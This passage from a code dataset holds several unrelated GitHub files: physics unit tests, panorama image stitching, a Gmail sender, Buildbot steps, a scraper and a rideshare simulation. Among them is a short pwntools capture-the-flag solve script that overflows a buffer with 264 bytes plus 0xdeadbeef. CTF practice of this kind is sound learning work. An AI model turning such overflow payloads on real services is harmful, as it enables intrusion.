vecs_prev_pi = force_analysis.calc_vectors(p_low, p_high, boxdims)\n vecs_next_pi = force_analysis.calc_vectors(p_high, p_low, boxdims)\n self.assertAlmostEqual(vecs_pos_no_pi[0, 0, 2], 4.4)\n self.assertAlmostEqual(vecs_neg_no_pi[1, 1, 2], -4)\n self.assertAlmostEqual(vecs_prev_pi[0, 0, 0], -1.6)\n self.assertAlmostEqual(vecs_next_pi[1, 1, 1], 1.1) # 2nd frame, 9.5 size\n\n\nclass test_calc_posres_forces(unittest.TestCase):\n\n def test_spring_constant_calculation(self):\n positive_displacements = np.zeros((10, 20, 3)) + 3.33\n negative_displacements = np.zeros((4, 18, 3)) - 3\n forces = force_analysis.calc_posres_forces(positive_displacements, 10)\n forces_neg = force_analysis.calc_posres_forces(negative_displacements, 10)\n self.assertSequenceEqual(negative_displacements.shape, (4, 18, 3))\n self.assertAlmostEqual(forces[0, 0, 0], 33.3)\n self.assertEqual(forces_neg[3, 10, 2], -30)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"scal444/dummy_particles","sub_path":"tests/test_force_analysis.py","file_name":"test_force_analysis.py","file_ext":"py","file_size_in_byte":4924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14445707477","text":"#!/usr/bin/env python\n\nimport sys\nfrom pwn import *\n\nif sys.argv[1] == \"local\":\n tube = process(sys.argv[2])\nelse:\n tube = remote(sys.argv[2], sys.argv[3])\n\ntube.recvuntil(b'see?\\n')\ntube.sendline(b'a' * 264 + (0xdeadbeef).to_bytes(8, 'little'))\ntube.recvuntil(b'troubles\\n')\nprint(tube.recvallS())\n","repo_name":"polychromatic-blackguardist/polychromatic-blackguardist.github.io","sub_path":"docs/sjqruaw/clutter-overflow/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30831796657","text":"import matplotlib.pyplot as plt\nfrom optimism.JaxConfig import *\n\nN = 150\nx = np.linspace(-0.05, 1.25, N)\n\ndef f(x):\n return -np.cos(7.14*x)*x + 0.2*x\n\ny = f(x)\ndy = vmap(grad(f))(x)\ndydy = 0.5*dy*dy\n\nplt.plot(x,15*y,'r',x,dydy,'b')\n\nplt.savefig('sin.png')\n","repo_name":"btalami/optimism","sub_path":"optimism/test/ConvexityPlot.py","file_name":"ConvexityPlot.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"37732192907","text":"import numpy as np\nimport cv2\nimport glob\nimport math\nfrom collections import defaultdict\nimport random\n\n# Config\nF_COLOR = (0, 0, 255)\nk = 0.04 # For Harris Corner\nR_DOWNSAMPLE = 4 # 4\nINPUT_DIR = \"../data/\" # \"roof/\"\nK_RANSAC = 3000 # How many iteration in RANSAC \nN_RANSAC = 8 # How many samples in RANSAC\nRANSAC_THRES = 10\nOUTPUT_NAME = \"roof_pano\"\n\ndef gkern(l=5, sig=1.):\n # Reference: https://stackoverflow.com/questions/29731726/how-to-calculate-a-gaussian-kernel-matrix-efficiently-in-numpy\n \"\"\"\n creates gaussian kernel with side length `l` and a sigma of `sig`\n \"\"\"\n ax = np.linspace(-(l - 1) / 2., (l - 1) / 2., l)\n gauss = np.exp(-0.5 * np.square(ax) / np.square(sig))\n kernel = np.outer(gauss, gauss)\n return kernel / np.sum(kernel)\n\ndef my_harris_corner(img_gray_f, k=0.04):\n '''\n Input: \n img - BGR image\n k = 0.04~0.06\n Output: \n [feature_1, feature_2, feature_3, ...]\n '''\n h ,w = img_gray_f.shape\n x_sobel = np.array([[-1, 0, 1],\n [-2, 0, 2],\n [-1, 0, 1]])\n y_sobel = np.array([[-1, -2, -1],\n [ 0, 0, 0],\n [ 1, 2, 1]])\n windows_kernal = np.array([[1, 
2, 1],\n [2, 4, 2],\n [1, 2, 1]])*(1/16)\n # \n I_x = cv2.filter2D(img_gray_f, -1, x_sobel)\n I_y = cv2.filter2D(img_gray_f, -1, y_sobel)\n # \n I_x2 = I_x*I_x\n I_y2 = I_y*I_y\n I_xy = I_x*I_y\n\n # Apply windows function \n A = cv2.filter2D(I_x2, -1, windows_kernal)# A\n B = cv2.filter2D(I_y2, -1, windows_kernal)# B\n C = cv2.filter2D(I_xy, -1, windows_kernal)# C\n # \n R = -k*A*A - k*B*B - C*C + (1-2*k)*A*B\n\n ret, img_R_bin = cv2.threshold(R, R.max()*0.01, 255, cv2.THRESH_BINARY)\n n_region, labels = cv2.connectedComponents(img_R_bin.astype('int8'))\n\n f_loc = []\n for label in range(1, n_region+1):\n f_loc.append(np.argmax(R*(labels==label)))\n\n # SIFT feature description\n # Find Major Orientation\n weight_filter = gkern(l = 20, sig = 10)\n M = np.sqrt(I_x2 + I_y2)\n M = np.pad(M, 20, mode='constant', constant_values=0)\n theta = np.arctan2(I_y, I_x)\n theta = np.pad(theta, 20, mode='constant', constant_values=float('nan'))\n\n maj_ori = [] # major orientation\n for f in f_loc:\n x, y = (f%w, f//w)\n x, y = x+20, y+20 # for padding\n votes = M[y-10:y+10, x-10:x+10] * weight_filter # pad zeros \n candidates = theta[y-10:y+10, x-10:x+10] # pad nan \n # \n votes = votes.ravel() # Reshape to 1D\n candidates = candidates.ravel() # Reshape to 1D\n v_box = defaultdict(int) # voting box\n for i in range(votes.shape[0]):\n if math.isnan(candidates[i]):\n continue\n c = candidates[i]//(math.pi/18)\n v_box[c] += votes[i]\n if len(v_box) == 0:# All candidates are nan\n maj_ori.append((0, 0))\n else:\n winner = max(v_box, key=v_box.get)\n maj_ori.append((winner, v_box[winner]))\n\n # Local Orientation \n descriptor_s = []\n for f in f_loc:\n x, y = (f%w, f//w)\n x, y = x+20, y+20 # for padding\n \n descriptor = []\n for x_off in [-8, -4, 0, 4]:\n for y_off in [-8, -4, 0, 4]:\n votes = M[y-y_off:y-y_off+8, x-x_off:x-x_off+8]\n candidates = theta[y-y_off:y-y_off+8, x-x_off:x-x_off+8]\n votes = votes.ravel() # Reshape to 1D\n candidates = candidates.ravel() # Reshape to 1D\n\n v_box = [0, 0, 0, 0, 0, 0, 0, 0]\n for i in range(votes.shape[0]):\n if math.isnan(candidates[i]):\n continue\n c_idx = int((candidates[i]//(math.pi/4)) + 4)\n if c_idx == 8: c_idx = 7 # Edge case\n v_box[c_idx] += votes[i]\n descriptor += v_box\n descriptor_s.append(descriptor)\n\n return list(zip(f_loc, descriptor_s))\n\ndef find_boundary(img_pano):\n lb = None # Left bound\n rb = None # Right bound\n for i in range(img_pano.shape[1]):\n if lb == None and np.any(img_pano[:, i]):\n lb = i\n elif lb != None and rb == None and (not np.any(img_pano[:, i])):\n rb = i\n break\n ub = None # Upper bound\n sb = None # south bound\n for i in range(img_pano.shape[0]):\n if ub == None and np.any(img_pano[i, :]):\n ub = i\n elif ub != None and sb == None and (not np.any(img_pano[i, :])):\n sb = i\n break\n return (lb, rb, ub, sb)\n\ndef to_cylinder_cor(ori_p, f_len):\n y, x = h//2 - ori_p[1], -w//2 + ori_p[0]\n xc = f_len*math.atan(x/f_len)\n yc = f_len*y/(math.sqrt(x**2 + f_len**2))\n return (int(xc + w//2), int(-yc + h//2))\n\nimg_list = [cv2.imread(i) for i in sorted(glob.glob(f\"{INPUT_DIR}*.jpg\"))]\nh ,w, c = img_list[0].shape\n\n# Preprocessing Resize\nimg_list_tmp = [cv2.resize(img, (w//R_DOWNSAMPLE, h//R_DOWNSAMPLE)) for img in img_list]\nimg_list = img_list_tmp\nh ,w, c = img_list[0].shape\n\n# This is for parrington \nf_lens = []\nwith open(f\"{INPUT_DIR}f_len.txt\", 'r') as f:\n f_lens = [float(line.split(\" \")[1]) for line in f.readlines()]\n\nprint(f\"Number of images = {len(img_list)}\")\n\nimg_cylinders = []\nfor i in 
range(len(img_list)):\n img_cylinder = np.zeros(shape=img_list[i].shape, dtype=np.uint8)\n for ori_y in range(h):\n for ori_x in range(w):\n y, x = h//2 - ori_y, -w//2 + ori_x\n xp = f_lens[i]*math.atan(x/f_lens[i])\n yp = f_lens[i]*y/(math.sqrt(x**2 + f_lens[i]**2))\n img_cylinder[int(-yp + h//2), int(xp + w//2)] = img_list[i][ori_y, ori_x]\n img_cylinders.append(img_cylinder)\n print(f\"{i}/{len(img_list)}\")\n\n\nmy_features_list = []\nfor i, img in enumerate(img_list):\n # Gray scale\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n img_gray_f = np.float32(img_gray) # Convert from uint8 to float32\n my_features = my_harris_corner(img_gray_f, k = k)\n my_features_list.append(my_features)\n print(f\"Number of harris_corner in img_{i} = {len(my_features)} \")\nprint(len(my_features_list))\n\nh ,w, c = img_list[0].shape\n# Init img_pano with first image\nimg_pano = np.zeros((2000, 10000, 3), np.uint8)\npano_ori = (0, 1000)\nimg_pano[pano_ori[1] - h//2:pano_ori[1] + h//2, \n pano_ori[0] :pano_ori[0] + w] = img_cylinders[0]\n\nfor i_curr in range(1, len(img_list)):\n i_prev = i_curr-1\n # Feature Matching\n match = [] # [(f1, f2), (f1, f2)]\n for q, q_des in my_features_list[i_prev]: # Query\n # Find match\n v_idx = None\n d_min_1st = float('inf')\n d_min_2nd = float('inf')\n for v, v_des in my_features_list[i_curr]: # value\n dis = np.linalg.norm(np.array(q_des) - np.array(v_des)) # L2 Distance\n if dis < d_min_1st:\n d_min_2nd = d_min_1st\n d_min_1st = dis\n v_idx = v\n \n # Check if it's a meaningful match\n if d_min_1st/d_min_2nd < 0.8:\n match.append((q, v_idx))\n print(f\"Number of matched features img_{i_prev}<->img_{i_curr}: {len(match)}\")\n\n # RANSAC\n min_n_out_dxy = float('inf')\n best_dxy = None # Best translation matrix\n best_match_dxy = None # Best feature set, For debugging \n for _ in range(K_RANSAC):\n random.shuffle(match)\n dx = 0\n dy = 0\n #\n match_cylider = []\n for f1, f2 in match[:N_RANSAC]:\n x1, y1 = to_cylinder_cor( (f1%w, f1//w) ,f_lens[0])\n x2, y2 = to_cylinder_cor( (f2%w, f2//w) ,f_lens[1])\n # \n dx += (x1 - x2)/N_RANSAC\n dy += (y1 - y2)/N_RANSAC\n # \n match_cylider.append((x1 + y1*w, x2 + y2*w))\n\n # Evaluate the number of outliers for this model.\n \n n_outliner_dxy = 0\n for f1, f2 in match:\n x1, y1 = to_cylinder_cor( (f1%w, f1//w) ,f_lens[0]) # TODO transform feature points to cylinder and find dx,dy\n x2, y2 = to_cylinder_cor( (f2%w, f2//w) ,f_lens[1])\n # dxy\n err_squ = ((x2+dx) - x1)**2 + ((y2+dy) - y1)**2\n if err_squ > RANSAC_THRES:\n n_outliner_dxy += 1\n\n if min_n_out_dxy > n_outliner_dxy:\n min_n_out_dxy = n_outliner_dxy\n best_dxy = (int(dx), int(dy))\n best_match_dxy = match_cylider\n\n print(f\"Reject rate for best match: {round(min_n_out_dxy/len(match)*100, 1)}% ({min_n_out_dxy}/{len(match)})\")\n print(f\"best_dxy = {best_dxy}\")\n\n pano_ori = (pano_ori[0] + best_dxy[0], pano_ori[1] + best_dxy[1])\n blend_srt = pano_ori[0]\n blend_len = w - best_dxy[0] # blend_end - blend_srt\n blend_end = blend_srt + blend_len # w\n for i in range(blend_srt, blend_end):\n for j in range(h):\n img1_percent = (blend_end - i) / blend_len\n img1_v = img_pano[pano_ori[1] - h//2 + j, i]\n img2_v = img_cylinders[i_curr][j, i-blend_srt]\n \n # Deal with black area\n if not np.any(img1_v): # all zero \n img1_percent = 0.0\n elif not np.any(img2_v): # all zero \n img1_percent = 1.0\n #\n img_pano[pano_ori[1] - h//2 + j, i] = img1_v * img1_percent + img2_v * (1-img1_percent)\n\n # Directly paste non-overlapping part\n img_pano[pano_ori[1] - h//2 :pano_ori[1] 
+ h//2, \n pano_ori[0] + blend_len:pano_ori[0] + w] = img_cylinders[i_curr][:, blend_len:]\n\nlb, rb, ub, sb = find_boundary(img_pano)\nimg_pano = img_pano[ub:sb, lb:rb]\n\ncv2.imwrite(f\"{OUTPUT_NAME}.jpg\", img_pano)\n\nstart_black = None\nfor i in range(img_pano.shape[0]):\n if np.any(img_pano[i, 0]):\n start_black = i\n break\nend_black = None\nfor i in range(img_pano.shape[0]):\n if np.any(img_pano[i, -1]):\n end_black = i\n break\n\nglobal_offset = end_black - start_black # Assuming drifting down \nstride_offset = global_offset / img_pano.shape[1]\nprint(f\"stride_offset = {stride_offset}\")\n\nimg_pano_driftless = np.zeros(img_pano.shape, np.uint8)\n\nif stride_offset >= 0:\n for i in range(img_pano.shape[1]):\n img_pano_driftless[:img_pano.shape[0] - int(i*stride_offset), i] = img_pano[int(i*stride_offset):, i]\nelse:\n stride_offset = abs(stride_offset)\n for i in range(img_pano.shape[1]-1, -1, -1):\n p = int( (img_pano.shape[1]-1-i)*stride_offset )\n img_pano_driftless[:img_pano.shape[0] - p, i] = img_pano[p:, i]\n\nlb, rb, ub, sb = find_boundary(img_pano_driftless)\nimg_pano_driftless = img_pano_driftless[ub:sb, lb:rb]\ncv2.imwrite(f\"{OUTPUT_NAME}_driftless.jpg\", img_pano_driftless)\n","repo_name":"KenYu910645/VFX2022","sub_path":"hw2_image_stiching/hw2_image_stiching.py","file_name":"hw2_image_stiching.py","file_ext":"py","file_size_in_byte":10728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18405417065","text":"import smtplib\nimport base64\nimport os\nimport json\nfrom email.message import EmailMessage\nfrom google.oauth2.credentials import Credentials\nfrom google.auth.transport.requests import Request\nfrom google_auth_oauthlib.flow import InstalledAppFlow\n\n\n# set up OAuth 2.0 credentials\ncreds = None\nif os.path.exists('token.json'):\n creds = Credentials.from_authorized_user_file('token.json', ['https://www.googleapis.com/auth/gmail.send'])\nif not creds or not creds.valid:\n with open('credentials.json', 'r') as f:\n client_config = json.load(f)['installed']\n flow = InstalledAppFlow.from_client_config(client_config, ['https://www.googleapis.com/auth/gmail.send'])\n creds = flow.run_local_server(port=0)\n with open('token.json', 'w') as token:\n token.write(creds.to_json())\n\n# create the message object\nmsg = EmailMessage()\nmsg['From'] = 'rahulmehta.rm933@gmail.com'\nmsg['To'] = 'rmehta.r7@gmail.com'\nmsg['Subject'] = 'Test email'\nmsg.set_content('This is a test email.')\n\n# send the email using SMTP; Gmail does not accept an OAuth access token via\n# login(), so authenticate with the XOAUTH2 SASL mechanism instead\nwith smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp:\n smtp.ehlo()\n auth_string = f\"user={msg['From']}\\x01auth=Bearer {creds.token}\\x01\\x01\"\n smtp.docmd('AUTH', 'XOAUTH2 ' + base64.b64encode(auth_string.encode()).decode())\n smtp.send_message(msg)\n","repo_name":"rahmeh7/Email_Using_SMTP_Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73181865444","text":"import json\nimport pytest\n\nfrom azure.identity import DefaultAzureCredential\nfrom azure.ml import MLClient\n\n\n@pytest.fixture(scope='session')\ndef component_config():\n config_file = 'component_config.json'\n\n with open(config_file, 'r') as cf:\n result = json.load(cf)\n\n return result\n\n@pytest.fixture(scope='session')\ndef workspace_config():\n ws_config_file = 'config.json'\n\n with open(ws_config_file) as cf:\n result = json.load(cf)\n\n return result\n\n@pytest.fixture(scope='function')\ndef ml_client(workspace_config):\n client = MLClient(\n credential=DefaultAzureCredential(),\n 
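# the remaining keyword arguments are read from the workspace config.json loaded by the workspace_config fixture above\n 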
subscription_id=workspace_config['subscription_id'],\n resource_group_name=workspace_config['resource_group'],\n workspace_name=workspace_config['workspace_name'],\n logging_enable=True\n )\n\n return client","repo_name":"Azure/AutoML-vNext-Preview","sub_path":"test/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"24275231011","text":"# import requests\r\n# import requests\r\n# import bs4\r\n#\r\n# # create lookup dictionary of canadian cities and their codes only\r\n# # lut = open('stations.txt', 'r').readlines()[3793:4673]\r\n# url = 'https://www.aviationweather.gov/adds/metars?station_ids=CYSM&std_trans=translated&chk_metars=on'\r\n#\r\n# metarHTML = requests.get(url)\r\n# metar = bs4.BeautifulSoup(metarHTML.text, 'lxml').select('strong')[1].getText().split()\r\n#\r\n# print(metar)\r\n\r\nnumDict = {}\r\n\r\nnumDict[6] = ['six']\r\n\r\nnumDict[6].append('seven')\r\n\r\nprint(numDict)\r\n","repo_name":"MaksimStadler/METAR-Training-Application","sub_path":"METAR Decoder/2019-04-22 Update/TEST.py","file_name":"TEST.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"138748707","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nfrom functools import wraps\nfrom scrapper import Scrapper\nimport fb\nimport pickle\nimport sys\n\n\ndef retry(func):\n @wraps(func)\n def decorated(*args):\n result = func(*args)\n while not result:\n print(\"Retrying..\")\n result = func(*args, retry=True)\n return result\n return decorated\n\n\nif __name__ == \"__main__\":\n scrapper = Scrapper()\n nodes = set()\n nodes_sets = [pickle.load(open(filename)) for filename in sys.argv[1:]]\n nodes_info_filename = \"all_nodes_info.pickle\"\n\n try:\n nodes_info = pickle.load(open(nodes_info_filename))\n processed = set(nodes_info.keys())\n except IOError:\n nodes_info = {}\n processed = set()\n\n for nodes_set in nodes_sets:\n for number, node in enumerate(nodes_set - processed):\n nodes_info[node] = scrapper.get_node_info(node)\n processed.add(node)\n try:\n print(\"%d / %d / %d %s\" % (len(processed), len(nodes_set), \n len(nodes_sets), nodes_info[node][\"name\"]))\n except:\n pass\n\n if not(number % 1000):\n nodes_info_file = open(nodes_info_filename, \"w\")\n pickle.dump(nodes_info, nodes_info_file)\n nodes_info_file.close()\n print(\"-------------------------------------------------- Flushed\")\n\n nodes_info_file = open(nodes_info_filename, \"w\")\n pickle.dump(nodes_info, nodes_info_file)\n nodes_info_file.close()\n print(\"-------------------------------------------------- Flushed\")\n","repo_name":"pointtonull/browser","sub_path":"examples/scrapper_info.py","file_name":"scrapper_info.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"13056524226","text":"import stat\n\nfrom buildbot.interfaces import BuildSlaveTooOldError\nfrom buildbot.process import buildstep\nfrom buildbot.status.results import FAILURE\nfrom buildbot.status.results import SUCCESS\n\n\nclass SlaveBuildStep(buildstep.BuildStep):\n\n def describe(self, done=False):\n return self.descriptionDone if done else self.description\n\n\nclass SetPropertiesFromEnv(SlaveBuildStep):\n\n \"\"\"\n Sets properties from environment variables on the slave.\n\n Note this is transferred when the slave first 
connects\n \"\"\"\n name = 'SetPropertiesFromEnv'\n description = ['Setting']\n descriptionDone = ['Set']\n\n def __init__(self, variables, source=\"SlaveEnvironment\", **kwargs):\n buildstep.BuildStep.__init__(self, **kwargs)\n self.variables = variables\n self.source = source\n\n def start(self):\n # on Windows, environment variables are case-insensitive, but we have\n # a case-sensitive dictionary in slave_environ. Fortunately, that\n # dictionary is also folded to uppercase, so we can simply fold the\n # variable names to uppercase to duplicate the case-insensitivity.\n fold_to_uppercase = (self.buildslave.slave_system == 'win32')\n\n properties = self.build.getProperties()\n environ = self.buildslave.slave_environ\n variables = self.variables\n log = []\n if isinstance(variables, str):\n variables = [self.variables]\n for variable in variables:\n key = variable\n if fold_to_uppercase:\n key = variable.upper()\n value = environ.get(key, None)\n if value:\n # note that the property is not uppercased\n properties.setProperty(variable, value, self.source,\n runtime=True)\n log.append(\"%s = %r\" % (variable, value))\n self.addCompleteLog(\"properties\", \"\\n\".join(log))\n self.step_status.setText(self.describe(done=True))\n self.finished(SUCCESS)\n\n\nclass FileExists(SlaveBuildStep):\n\n \"\"\"\n Check for the existence of a file on the slave.\n \"\"\"\n name = 'FileExists'\n description = 'Checking'\n descriptionDone = 'Checked'\n\n renderables = ['file']\n\n haltOnFailure = True\n flunkOnFailure = True\n\n def __init__(self, file, **kwargs):\n buildstep.BuildStep.__init__(self, **kwargs)\n self.file = file\n\n def start(self):\n slavever = self.slaveVersion('stat')\n if not slavever:\n raise BuildSlaveTooOldError(\"slave is too old, does not know \"\n \"about stat\")\n cmd = buildstep.RemoteCommand('stat', {'file': self.file})\n d = self.runCommand(cmd)\n d.addCallback(lambda res: self.commandComplete(cmd))\n d.addErrback(self.failed)\n\n def commandComplete(self, cmd):\n if cmd.didFail():\n self.step_status.setText([\"File not found.\"])\n self.finished(FAILURE)\n return\n s = cmd.updates[\"stat\"][-1]\n if stat.S_ISREG(s[stat.ST_MODE]):\n self.step_status.setText([\"File found.\"])\n self.finished(SUCCESS)\n else:\n self.step_status.setText([\"Not a file.\"])\n self.finished(FAILURE)\n\n\nclass CopyDirectory(SlaveBuildStep):\n\n \"\"\"\n Copy a directory tree on the slave.\n \"\"\"\n name = 'CopyDirectory'\n description = ['Copying']\n descriptionDone = ['Copied']\n\n renderables = ['src', 'dest']\n\n haltOnFailure = True\n flunkOnFailure = True\n\n def __init__(self, src, dest, timeout=None, maxTime=None, **kwargs):\n buildstep.BuildStep.__init__(self, **kwargs)\n self.src = src\n self.dest = dest\n self.timeout = timeout\n self.maxTime = maxTime\n\n def start(self):\n slavever = self.slaveVersion('cpdir')\n if not slavever:\n raise BuildSlaveTooOldError(\"slave is too old, does not know \"\n \"about cpdir\")\n\n args = {'fromdir': self.src, 'todir': self.dest}\n if self.timeout:\n args['timeout'] = self.timeout\n if self.maxTime:\n args['maxTime'] = self.maxTime\n\n cmd = buildstep.RemoteCommand('cpdir', args)\n d = self.runCommand(cmd)\n d.addCallback(lambda res: self.commandComplete(cmd))\n d.addErrback(self.failed)\n\n def commandComplete(self, cmd):\n if cmd.didFail():\n self.step_status.setText([\"Copying\", self.src, \"to\", self.dest, \"failed.\"])\n self.finished(FAILURE)\n return\n self.step_status.setText(self.describe(done=True))\n self.finished(SUCCESS)\n\n def 
describe(self, done=False):\n desc = self.descriptionDone if done else self.description\n desc = desc[:]\n desc.extend([self.src, \"to\", self.dest])\n return desc\n\n\nclass RemoveDirectory(SlaveBuildStep):\n\n \"\"\"\n Remove a directory tree on the slave.\n \"\"\"\n name = 'RemoveDirectory'\n description = ['Deleting']\n descriptionDone = ['Deleted']\n\n renderables = ['dir']\n\n haltOnFailure = True\n flunkOnFailure = True\n\n def __init__(self, dir, **kwargs):\n buildstep.BuildStep.__init__(self, **kwargs)\n self.dir = dir\n\n def start(self):\n slavever = self.slaveVersion('rmdir')\n if not slavever:\n raise BuildSlaveTooOldError(\"slave is too old, does not know \"\n \"about rmdir\")\n cmd = buildstep.RemoteCommand('rmdir', {'dir': self.dir})\n d = self.runCommand(cmd)\n d.addCallback(lambda res: self.commandComplete(cmd))\n d.addErrback(self.failed)\n\n def commandComplete(self, cmd):\n if cmd.didFail():\n self.step_status.setText([\"Delete failed.\"])\n self.finished(FAILURE)\n return\n self.step_status.setText(self.describe(done=True))\n self.finished(SUCCESS)\n\n\nclass MakeDirectory(SlaveBuildStep):\n\n \"\"\"\n Create a directory on the slave.\n \"\"\"\n name = 'MakeDirectory'\n description = ['Creating']\n descriptionDone = ['Created']\n\n renderables = ['dir']\n\n haltOnFailure = True\n flunkOnFailure = True\n\n def __init__(self, dir, **kwargs):\n buildstep.BuildStep.__init__(self, **kwargs)\n self.dir = dir\n\n def start(self):\n slavever = self.slaveVersion('mkdir')\n if not slavever:\n raise BuildSlaveTooOldError(\"slave is too old, does not know \"\n \"about mkdir\")\n cmd = buildstep.RemoteCommand('mkdir', {'dir': self.dir})\n d = self.runCommand(cmd)\n d.addCallback(lambda res: self.commandComplete(cmd))\n d.addErrback(self.failed)\n\n def commandComplete(self, cmd):\n if cmd.didFail():\n self.step_status.setText([\"Create failed.\"])\n self.finished(FAILURE)\n return\n self.step_status.setText(self.describe(done=True))\n self.finished(SUCCESS)\n\n\nclass CompositeStepMixin():\n\n def addLogForRemoteCommands(self, logname):\n \"\"\"This method must be called by user classes\n composite steps could create several logs, this mixin functions will write\n to the last one.\n \"\"\"\n self.rc_log = self.addLog(logname)\n return self.rc_log\n\n def runRemoteCommand(self, cmd, args, abandonOnFailure=True,\n evaluateCommand=lambda cmd: cmd.didFail()):\n \"\"\"generic RemoteCommand boilerplate\"\"\"\n cmd = buildstep.RemoteCommand(cmd, args)\n cmd.useLog(self.rc_log, False)\n d = self.runCommand(cmd)\n\n def commandComplete(cmd):\n if abandonOnFailure and cmd.didFail():\n raise buildstep.BuildStepFailed()\n return evaluateCommand(cmd)\n\n d.addCallback(lambda res: commandComplete(cmd))\n return d\n\n def runRmdir(self, dir, **kwargs):\n \"\"\" remove a directory from the slave \"\"\"\n return self.runRemoteCommand('rmdir',\n {'dir': dir, 'logEnviron': self.logEnviron},\n **kwargs)\n\n def pathExists(self, path):\n \"\"\" test whether path exists\"\"\"\n def commandComplete(cmd):\n return not cmd.didFail()\n\n return self.runRemoteCommand('stat', {'file': path,\n 'logEnviron': self.logEnviron, },\n abandonOnFailure=False,\n evaluateCommand=commandComplete)\n\n def runMkdir(self, _dir, **kwargs):\n \"\"\" create a directory and its parents\"\"\"\n return self.runRemoteCommand('mkdir', {'dir': _dir,\n 'logEnviron': self.logEnviron, },\n **kwargs)\n\n def runGlob(self, glob):\n \"\"\" find files matching a shell-style pattern\"\"\"\n def commandComplete(cmd):\n return 
cmd.updates['files'][-1]\n\n return self.runRemoteCommand('glob', {'glob': glob,\n 'logEnviron': self.logEnviron, },\n evaluateCommand=commandComplete)\n","repo_name":"jollyroger/debian-buildbot","sub_path":"buildbot/steps/slave.py","file_name":"slave.py","file_ext":"py","file_size_in_byte":9215,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"72543814244","text":"\"\"\"Simulation Events\n\nThis file should contain all of the classes necessary to model the different\nkinds of events in the simulation.\n\"\"\"\nfrom rider import Rider, WAITING, CANCELLED, SATISFIED\nfrom dispatcher import Dispatcher\nfrom driver import Driver\nfrom location import Location, deserialize_location\nfrom monitor import Monitor, RIDER, DRIVER, REQUEST, CANCEL, PICKUP, DROPOFF\n\n\nclass Event:\n \"\"\"An event.\n\n Events have an ordering that is based on the event timestamp: Events with\n older timestamps are less than those with newer timestamps.\n\n This class is abstract; subclasses must implement do().\n\n You may, if you wish, change the API of this class to add\n extra public methods or attributes. Make sure that anything\n you add makes sense for ALL events, and not just a particular\n event type.\n\n Document any such changes carefully!\n\n === Attributes ===\n @type timestamp: int\n A timestamp for this event.\n \"\"\"\n\n def __init__(self, timestamp):\n \"\"\"Initialize an Event with a given timestamp.\n\n @type self: Event\n @type timestamp: int\n A timestamp for this event.\n Precondition: must be a non-negative integer.\n @rtype: None\n\n >>> Event(7).timestamp\n 7\n \"\"\"\n self.timestamp = timestamp\n\n # The following six 'magic methods' are overridden to allow for easy\n # comparison of Event instances. 
All comparisons simply perform the\n    # same comparison on the 'timestamp' attribute of the two events.\n    def __eq__(self, other):\n        \"\"\"Return True iff this Event is equal to <other>.\n\n        Two events are equal iff they have the same timestamp.\n\n        @type self: Event\n        @type other: Event\n        @rtype: bool\n\n        >>> first = Event(1)\n        >>> second = Event(2)\n        >>> first == second\n        False\n        >>> second.timestamp = first.timestamp\n        >>> first == second\n        True\n        \"\"\"\n        return self.timestamp == other.timestamp\n\n    def __ne__(self, other):\n        \"\"\"Return True iff this Event is not equal to <other>.\n\n        @type self: Event\n        @type other: Event\n        @rtype: bool\n\n        >>> first = Event(1)\n        >>> second = Event(2)\n        >>> first != second\n        True\n        >>> second.timestamp = first.timestamp\n        >>> first != second\n        False\n        \"\"\"\n        return not self == other\n\n    def __lt__(self, other):\n        \"\"\"Return True iff this Event is less than <other>.\n\n        @type self: Event\n        @type other: Event\n        @rtype: bool\n\n        >>> first = Event(1)\n        >>> second = Event(2)\n        >>> first < second\n        True\n        >>> second < first\n        False\n        \"\"\"\n        return self.timestamp < other.timestamp\n\n    def __le__(self, other):\n        \"\"\"Return True iff this Event is less than or equal to <other>.\n\n        @type self: Event\n        @type other: Event\n        @rtype: bool\n\n        >>> first = Event(1)\n        >>> second = Event(2)\n        >>> first <= first\n        True\n        >>> first <= second\n        True\n        >>> second <= first\n        False\n        \"\"\"\n        return self.timestamp <= other.timestamp\n\n    def __gt__(self, other):\n        \"\"\"Return True iff this Event is greater than <other>.\n\n        @type self: Event\n        @type other: Event\n        @rtype: bool\n\n        >>> first = Event(1)\n        >>> second = Event(2)\n        >>> first > second\n        False\n        >>> second > first\n        True\n        \"\"\"\n        return not self <= other\n\n    def __ge__(self, other):\n        \"\"\"Return True iff this Event is greater than or equal to <other>.\n\n        @type self: Event\n        @type other: Event\n        @rtype: bool\n\n        >>> first = Event(1)\n        >>> second = Event(2)\n        >>> first >= first\n        True\n        >>> first >= second\n        False\n        >>> second >= first\n        True\n        \"\"\"\n        return not self < other\n\n    def __str__(self):\n        \"\"\"Return a string representation of this event.\n\n        @type self: Event\n        @rtype: str\n        \"\"\"\n        raise NotImplementedError(\"Implemented in a subclass\")\n\n    def do(self, dispatcher, monitor):\n        \"\"\"Do this Event.\n\n        Update the state of the simulation, using the dispatcher, and any\n        attributes according to the meaning of the event.\n\n        Notify the monitor of any activities that have occurred during the\n        event.\n\n        Return a list of new events spawned by this event (making sure the\n        timestamps are correct).\n\n        Note: the \"business logic\" of what actually happens should not be\n        handled in any Event classes.\n\n        @type self: Event\n        @type dispatcher: Dispatcher\n        @type monitor: Monitor\n        @rtype: 